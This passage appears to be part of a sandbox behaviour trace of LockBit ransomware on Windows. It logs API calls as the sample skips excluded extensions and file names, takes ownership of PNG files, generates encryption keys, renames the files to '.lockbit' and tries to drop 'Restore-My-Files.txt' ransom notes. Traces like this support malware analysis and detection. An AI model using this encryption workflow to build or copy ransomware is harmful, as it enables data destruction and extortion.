lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0086.580] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0086.580] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0086.580] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0086.581] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0086.581] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\") returned="" [0086.581] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png") returned=".png" [0086.581] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0086.581] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0086.581] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0086.581] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0086.582] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0086.582] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0086.582] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0086.582] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0086.582] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0086.582] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0086.582] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0086.582] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0086.582] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0086.582] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0086.582] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png.lockbit") returned 107 [0086.582] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.583] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.583] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.583] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.584] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.584] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.584] RtlFreeAnsiString (AnsiString="\\") [0086.584] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0086.584] malloc (_Size=0x200) returned 0x77d800 [0086.584] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0086.584] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.584] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.584] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.585] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.585] CloseHandle (hObject=0x3b8) returned 1 [0086.585] free (_Block=0x77d800) [0086.586] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0086.586] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.586] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.586] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3118) returned 1 [0086.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.588] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.650] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.650] malloc (_Size=0xec) returned 0x1ff1e60 [0086.650] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xec, FileInformationClass=0xa) returned 0x0 [0086.651] free (_Block=0x1ff1e60) [0086.651] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 1 [0086.651] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt") returned 80 [0086.651] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.652] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7079e029, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7079e029, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0086.652] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0086.652] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0086.652] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0086.652] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0086.652] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0086.652] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0086.653] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0086.653] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0086.653] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0086.653] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0086.653] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0086.653] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0086.653] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0086.653] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0086.654] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0086.654] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0086.654] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0086.654] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0086.654] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0086.654] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.654] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0086.654] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0086.654] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0086.654] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0086.654] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0086.654] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0086.654] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0086.654] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0086.654] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0086.654] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0086.654] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0086.654] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\") returned="" [0086.654] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png") returned=".png" [0086.654] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0086.654] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0086.655] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0086.655] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0086.656] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0086.656] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0086.656] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0086.656] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0086.656] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0086.656] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0086.656] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0086.656] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0086.656] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0086.656] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0086.656] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0086.656] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png.lockbit") returned 98 [0086.656] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.657] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.657] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.658] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.658] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.658] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.658] RtlFreeAnsiString (AnsiString="\\") [0086.658] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0086.658] malloc (_Size=0x200) returned 0x77d800 [0086.658] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0086.659] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.659] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.659] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.659] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.660] CloseHandle (hObject=0x3ac) returned 1 [0086.660] free (_Block=0x77d800) [0086.660] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0086.660] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.660] malloc (_Size=0x40068) returned 0x3df0008 [0086.660] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4955) returned 1 [0086.660] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.661] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0086.661] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.662] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0086.662] ReadFile (in: hFile=0x3ac, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0086.680] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.680] malloc (_Size=0xda) returned 0x1ff1e60 [0086.680] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xda, FileInformationClass=0xa) returned 0x0 [0086.681] free (_Block=0x1ff1e60) [0086.681] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 1 [0086.681] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt") returned 80 [0086.681] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.681] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x707ea2e3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x707ea2e3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efc9a7d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0086.681] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0086.681] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0086.681] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0086.681] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0086.681] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0086.681] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0086.681] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0086.681] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0086.681] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0086.681] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0086.681] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0086.681] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0086.681] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0086.682] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0086.682] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0086.682] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0086.682] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0086.682] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0086.682] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0086.682] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0086.682] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0086.682] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0086.682] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0086.682] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0086.682] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0086.682] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0086.682] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0086.686] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.686] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0086.686] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0086.686] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0086.686] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0086.686] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0086.686] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0086.686] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0086.686] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0086.686] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0086.686] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0086.686] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0086.686] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0086.687] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0086.687] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0086.687] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0086.687] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0086.687] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0086.687] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.687] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0086.687] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0086.687] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0086.687] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0086.687] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0086.687] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0086.687] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0086.687] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0086.687] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0086.687] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0086.687] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0086.687] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\") returned="" [0086.688] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png") returned=".png" [0086.688] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0086.688] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0086.688] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".dacpac", lpString2=".png") 